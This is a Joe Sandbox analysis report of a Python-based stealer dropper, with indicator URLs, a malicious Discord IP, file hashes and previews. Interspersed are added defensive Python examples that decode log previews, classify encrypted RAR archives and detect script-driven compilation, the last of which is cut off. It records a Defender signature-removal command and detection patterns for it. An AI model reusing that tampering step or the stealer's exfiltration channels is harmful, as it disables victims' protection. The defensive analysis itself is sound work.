                  https://html.spec.whatwg.org/multipage/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ifeng.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.zhihu.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/powershell.exe, 0000002D.00000002.1611004763.0000014D1A58A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://oneget.orgXpowershell.exe, 0000002D.00000002.1546305256.0000014D0BB13000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.iana.org/time-zones/repository/tz-link.htmlSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1350868217.0000016197390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1349900990.0000016197390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1350081558.0000016196FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.comSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1372272672.00000161970AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.gofile.io/getServerSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exefalse
                  • URL Reputation: safe
                  unknown
                  https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1544534122.0000028190078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1611004763.0000014D1A6CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1546305256.0000014D0BE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1611004763.0000014D1A58A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000002D.00000002.1546305256.0000014D0BB13000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.moziSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1383035256.00000161970DE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://sectigo.com/CPS0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, rar.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C55000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.amazon.co.uk/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ocsp.thawte.com0SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329121115.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://json.orgSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1351974107.0000016196DCF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.wykop.pl/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767449451.0000016197D70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://twitter.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1759071926.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1437068870.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1408881507.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373771178.000001619707C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764538565.0000016196A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.olx.pl/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197F34000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1767569172.0000016197EE4000.00000004.00001000.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/products/firefoxSecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379613683.0000016197193000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1376271059.00000161970EA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1373841693.000001619712E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1377195618.00000161970EF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://google.com/SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424909795.000001619707F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764538565.0000016196A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1379967159.0000016197320000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765287498.0000016197083000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1459659839.00000161970B3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.135.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446241
Start date and time: 2024-05-23 01:35:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 95
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@144/56@2/2
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 109
• Number of non-executed functions: 153
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.217.23.99
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8788 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• VT rate limit hit for: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Time | Type | Description
19:36:12 | API Interceptor | 151x Sleep call for process: powershell.exe modified
19:36:15 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 705938
Entropy (8bit): 7.926485816467803
Encrypted: false
SSDEEP: 12288:ri14OwteQnWA/P/2naEFKV5x6UMmcCG01Cf2JyRx+7ozFteX7Dz/N1DFHOqwlBPZ:riXZAuaEe5xGiGv2Yx4MTeX7HrD5ORnR
MD5: D6E5D1CF115BC4A4EFE1D713E5F024AA
SHA1: C5E4E4352B1494909930BD38DE2D822BCDC423F7
SHA-256: F596346E48EB1C5A840051331BE043E69651DDB5EC0154B5FA5C9EF8650BF4BD
SHA-512: EA004DF6CC21923F4AE49B596B53C148E046804343F05B320C31D591EC3EF371A42D47A068BDCDBB663D64A37D12813C4376DFF0CE2D1DAD459C56829F7688CB
Malicious: false
                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.w.m..{N....q./..y..f......mu..7.....'o@B.!...@..od..C ....q..[..@.....k..u\.[.T7..\.2.9..[..+.n.N}5.....R.l..kE.o{..J_.'.....3.1e......s..^.D.Yd..m.k......'h..Bj}...}.F......G.....11.>.j8..UJk...1v.x.'.#m....1u.?...*.>..}l..yr ...:.<.06M..=>-.....GGJ.....XA...O....j....i.s.M....=.............y.a......M..>+k~9.c....O...O...........M..G..0......}.k.>|wO.?.3...2.{W..ug...}..L...b...{...5.~<......>p[...O..{..oM.......4o.m.........[b.......+.oy.1{.w.9..g.vSZ..->nq.....]+..fqc..l.....{o.h<..MMl..nK.v.=v.!.....}..>.....9.`.....Z.....;..v.>.......6../x.}6.i,....Mi..,.v>1.]@..[.\.....>.m......hK...K.}k..oks.\.io}u.[..Mi...}...l....VW...W.v|k.<.\..........`{....-/.y.&3o[......c~.}.....o}Un5Vl.V.....Wd..s.li.-l.P.l..2._ncrl...o~e..#6...].................m...}........XK.p3[...mb..x....i|.]...'.3..-....|>..z..........ru=....=..X,.k.....rl.-.
                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):894
                                                          Entropy (8bit):3.113609388377711
                                                          Encrypted:false
                                                          SSDEEP:12:Q58KRBubdpkoPAGdjrlsXiRk9+MlWlLehW51ICEsXiw:QOaqdmOFdjrl8z+kWResLIN8Z
                                                          MD5:CF9649E07AF853959C090C28A9152A89
                                                          SHA1:F647D908173987771C5223096289031901558FE8
                                                          SHA-256:18ED40D3E617C31DEA2B6444622D3D99E3DEC0C21677F8CE0272889453A42A1C
                                                          SHA-512:1ED266F9E11D01A87BC928696DFC517B4F0E4994BEA1BD68D0A29E04E34953B47336F60DD1FE438DFFBA52E63408D8BEDE7A1E60BCE6F3EC58209D53287F43D1
                                                          Malicious:false
                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 2.2. .. 2.0.2.4. .1.9.:.3.6.:.3.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 2.2. .. 2.0.2.4. .1.9.:.3.6.:.3.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
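The Preview above is MpCmdRun's own log, stored as UTF-16LE; the report renders every non-printable byte as a '.', so each character appears followed by a dot standing in for its NUL high byte. The block below is an added example written for this page, not part of the Joe Sandbox report: it recovers the text from such a preview and flags the signature-removal switch that the log records. The embedded string is an excerpt copied from the Preview field above; the function names and the regular expression are mine.

```python
import re

# Excerpt of the Preview field of the MpCmdRun.exe log entry, copied verbatim
# from the report. UTF-16LE ASCII text shows up as "M.p.C.m.d." because the
# report substitutes '.' for each NUL high byte.
MPCMDRUN_PREVIEW = (
    r'M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. '
    r'.F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". '
    r'. .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l.....'
)

# MpCmdRun.exe -RemoveDefinitions [-All] deletes the installed signature set;
# the switch name is documented for MpCmdRun, the regex is this example's.
DEFENDER_TAMPER = re.compile(r'MpCmdRun\.exe"?\s+-RemoveDefinitions\b', re.IGNORECASE)


def decode_dotted_utf16(preview: str) -> str:
    """Recover the text of a UTF-16LE file from a Joe Sandbox Preview string.

    Each ASCII character is followed by a '.' for its NUL high byte, so one of
    the two byte parities holds the text. Both are tried and the one with more
    letters and digits wins, which copes with a BOM or CRLF at the start of an
    excerpt. Genuine dots in the text (e.g. "MpCmdRun.exe") survive because
    they sit on the character parity.
    """
    candidates = [preview[0::2], preview[1::2]]
    return max(candidates, key=lambda s: sum(c.isalnum() for c in s))


def defender_tamper_hits(text: str) -> list[str]:
    """Return every MpCmdRun invocation in `text` that strips Defender signatures."""
    return [m.group(0) for m in DEFENDER_TAMPER.finditer(text)]


if __name__ == "__main__":
    decoded = decode_dotted_utf16(MPCMDRUN_PREVIEW)
    print(decoded)
    print("tamper hits:", defender_tamper_hits(decoded))
```

The same decoder applies to any UTF-16 text artifact in the report (PowerShell transcripts, .lnk and .url files); for binary previews the parity heuristic is meaningless and the hashes, not the preview, are the thing to pivot on.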
                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
                                                          File Type:RAR archive data, v5
                                                          Category:dropped
                                                          Size (bytes):755422
                                                          Entropy (8bit):7.999771841752418
                                                          Encrypted:true
                                                          SSDEEP:12288:zUxTIMlGabBMZ5SX37Je/NUiGkHmKkjnekQAGQ2YqihYLa+RqZ7g742R0J:MTIMlG7r239eWiHmKWewGQY2aUZUR0J
                                                          MD5:F0FBE0DCFC39060F546918164A8C9313
                                                          SHA1:747A50E9FD83EDBC67E96E1B335F687AF7BC51AB
                                                          SHA-256:99A22CB334DC2E8C77017CBF14D0597ADC088EC8B5152598E566736D644C36A7
                                                          SHA-512:5EE335B929326C2CFC7ED8AA42CFDDDA34EAA7F9D017C0ACC7B664E942D2889E13F5432A712603739E8F6918E37C0CC2BBCEC13B317229BD508287BB7B9FA1DF
                                                          Malicious:true
                                                          Preview:Rar!....bhS.!......X.G(".....w%A._......1.P..........._...S.h..v.....{.=.#s.%.....2..YJ........[{[... ...Z...........0.k}.e..a...)jy.0O:/])*..).HW#..&|-?..'....._.... Y...!.Q..0}.T<...Y..}...i./=e.....:..U.g..?...........R...1..}.........g..I..A.Us.K.f.....~.Hh.@n.d...J.C[`..W...H.....3.M....+c...... !W0gd.3;.9A."./.=....>\q."5.!z..<k...9.8<d....Nj<.l.H....yX=j. ..d..W.....*"7.,..|.-z....8.k....]....f.....ha.@....O_;......_X....fn~......{F.#....|U.~Q..`T..".2h.|b.8.bX.g5jL....j...YK]..94T.d...)..'[.'.&]\...G...ya...n....?...@...h...=%...............C.S6..n.....&.px.q...4..;.$.........%..z..B.]oO...Y..]%.R7m.o.z1q`..s....D(...f..}K..MM..:hF}....=....#..d.....5F..z.<..*....y...8.g......n..\*..l.YV....4xJ=[..C..Q....s.z.A.61n....NH2..j*_q..#.$.........3@....l.M#P......M...(.>.f.;J.u\^....T.c...%.%...7..rq]...r.........4s</;.Y..2s40&.....1/wk?..@.....k......Nv.eM......kA..^QG.~....4U....P..1.Y......t~#..-:8...MaXs:...o.&.6.vrAe..{e..D..Y
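The archive above was written by the rar.exe unpacked from the PyInstaller bundle, sits within 0.0003 of the 8-bit entropy maximum, and is marked Encrypted. One check a responder wants on such a file is whether the RAR5 headers themselves are encrypted (what rar's -hp switch produces) or only the file data (-p), since that decides whether the file list can be recovered without the password. The block below is an added example written for this page, not tooling from the report or from WinRAR; it walks the RAR5 block structure (signature, CRC32, vint-encoded sizes, header type 4 = archive encryption header). The two sample archives are constructed here and are not the dropped file, and whether this particular archive used -hp is an assumption consistent with the Encrypted flag, not something the report states.

```python
import struct
import zlib

RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"

# RAR5 header types; 4 appears first only when the headers are encrypted (-hp).
HEADER_TYPES = {1: "main", 2: "file", 3: "service", 4: "archive-encryption", 5: "end"}


def vint_encode(value: int) -> bytes:
    """RAR5 variable-length integer: 7 data bits per byte, little-endian,
    high bit set on every byte except the last."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def vint_decode(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode a vint at buf[pos]; return (value, position after it)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated vint")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, pos


def build_header(htype: int, hflags: int, body: bytes) -> bytes:
    """Assemble one RAR5 block: CRC32 | size(vint) | type(vint) | flags(vint) | body.
    The CRC32 covers everything from the size field to the end of the block."""
    payload = vint_encode(htype) + vint_encode(hflags) + body
    sized = vint_encode(len(payload)) + payload
    return struct.pack("<I", zlib.crc32(sized) & 0xFFFFFFFF) + sized


def classify_rar5(data: bytes) -> str:
    """Return 'not-rar5', 'encrypted-headers', 'plain-headers' or 'no-headers'.

    Only the leading bytes are needed: with -hp the first block after the
    signature is type 4 and everything after it is ciphertext; with -p the
    headers stay readable and only file data is encrypted (not detected here,
    that lives in a per-file extra record).
    """
    if not data.startswith(RAR5_SIGNATURE):
        return "not-rar5"
    pos = len(RAR5_SIGNATURE)
    while pos + 4 < len(data):
        (crc,) = struct.unpack_from("<I", data, pos)
        size, body_start = vint_decode(data, pos + 4)
        block_end = body_start + size
        if block_end > len(data):
            raise ValueError("truncated header")
        if zlib.crc32(data[pos + 4:block_end]) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad header CRC at offset {pos}")
        htype, p = vint_decode(data, body_start)
        hflags, p = vint_decode(data, p)
        if htype == 4:
            return "encrypted-headers"
        if htype in (1, 2, 3):
            return "plain-headers"
        if htype == 5:
            break
        # Unknown block type: honour the optional extra/data areas and move on.
        if hflags & 0x01:
            _extra, p = vint_decode(data, p)
        data_size = 0
        if hflags & 0x02:
            data_size, p = vint_decode(data, p)
        pos = block_end + data_size
    return "no-headers"


def constructed_archive(encrypted: bool) -> bytes:
    """Minimal RAR5 prefix built for this example (not the dropped archive)."""
    if encrypted:
        # Type 4 body: version=0 (AES-256), flags=0 (no check value), KDF count, 16-byte salt.
        body = vint_encode(0) + vint_encode(0) + bytes([15]) + bytes(16)
        return RAR5_SIGNATURE + build_header(4, 0, body)
    # Type 1 main header with archive flags = 0.
    return RAR5_SIGNATURE + build_header(1, 0, vint_encode(0))


if __name__ == "__main__":
    for enc in (True, False):
        print(enc, classify_rar5(constructed_archive(enc)))
```

Run it against a real file with `classify_rar5(open(path, "rb").read(4096))`; the first few hundred bytes are enough because the check stops at the first main or encryption block. A bad CRC on the first block usually means a truncated or still-being-written archive rather than tampering.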
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu May 23 01:16:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1372
                                                          Entropy (8bit):4.097862651087334
                                                          Encrypted:false
                                                          SSDEEP:24:HSq9UjwZLcxIuwZH8MFwK9GMwZnMhNwI+ycuZhNdAakS8lPNnqS+d:cjwZluwZcFKdwZnMhm1ul+a3qqSe
                                                          MD5:3E662A6A58B9AD70828BD4FE05B0E130
                                                          SHA1:2F127C85E06445B4ACC4469266CE577BD06F6311
                                                          SHA-256:5C3B71BB73E2D15FB0D44045369219B74D9A8E45E5FBF0A7F8534DF30B65363A
                                                          SHA-512:F761FEE65736E7FBCF54E7DE82F982D4FCE64F6C85E3D604AAB6756992732CE7DA7C83E81F8D8DEB705C90881A4BF8B07F347EB8AB6A967DE785551048942BA4
                                                          Malicious:false
                                                          Preview:L.....Nf.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP................./..r.R...l^............3.......C:\Users\user\AppData\Local\Temp\RES3733.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.3.m.2.u.w.l.3...d.l.l.....(.....L.e.g.a.
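The COFF object above was emitted by cvtres.exe with a working directory of %TEMP% and references a CSC<GUID>.TMP file inside a random eight-character directory plus a RES<hex>.tmp beside it, the file layout PowerShell's Add-Type leaves behind when it hands generated C# to csc.exe (an inference from the paths, not a statement the report makes). The detection logic below is an added example for this page, not from the report or from any SIEM product: it scores process-creation events for a compiler started from a script host and compiling out of %TEMP%. The events are constructed here using Sysmon Event ID 1 field names; their command lines are built to mirror the paths in the preview and are not copied from the report's process tree.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 field names).
# Not taken from the report; the paths mirror those in the COFF preview.
EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" '
                    r'/noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'cvtres.exe /NOLOGO /READONLY "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" '
                    r'"c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"'},
    # A build-server compile from a project tree: should not fire.
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r'csc.exe /noconfig @"C:\src\app\obj\Release\app.csproj.rsp"'},
]

COMPILERS = {"csc.exe", "vbc.exe", "cvtres.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Add-Type artefact names: CSC<32 hex>.TMP, RES<hex>.tmp, <8 chars>.cmdline
TEMP_ARTIFACT = re.compile(
    r"\\(CSC[0-9A-F]{32}\.TMP|RES[0-9A-F]+\.tmp|[a-z0-9]{8}\.cmdline)\b", re.IGNORECASE
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_compile(event: dict) -> list[str]:
    """Return the reasons a compiler process-creation event looks like
    script-driven in-memory compilation; empty list means not a compiler
    or nothing suspicious."""
    reasons: list[str] = []
    if basename(event["Image"]) not in COMPILERS:
        return reasons
    cmdline = event["CommandLine"]
    if TEMP_PATH.search(cmdline):
        reasons.append("compiles from %TEMP%")
    if TEMP_ARTIFACT.search(cmdline):
        reasons.append("Add-Type style artefact names")
    if basename(event["ParentImage"]) in SCRIPT_HOSTS:
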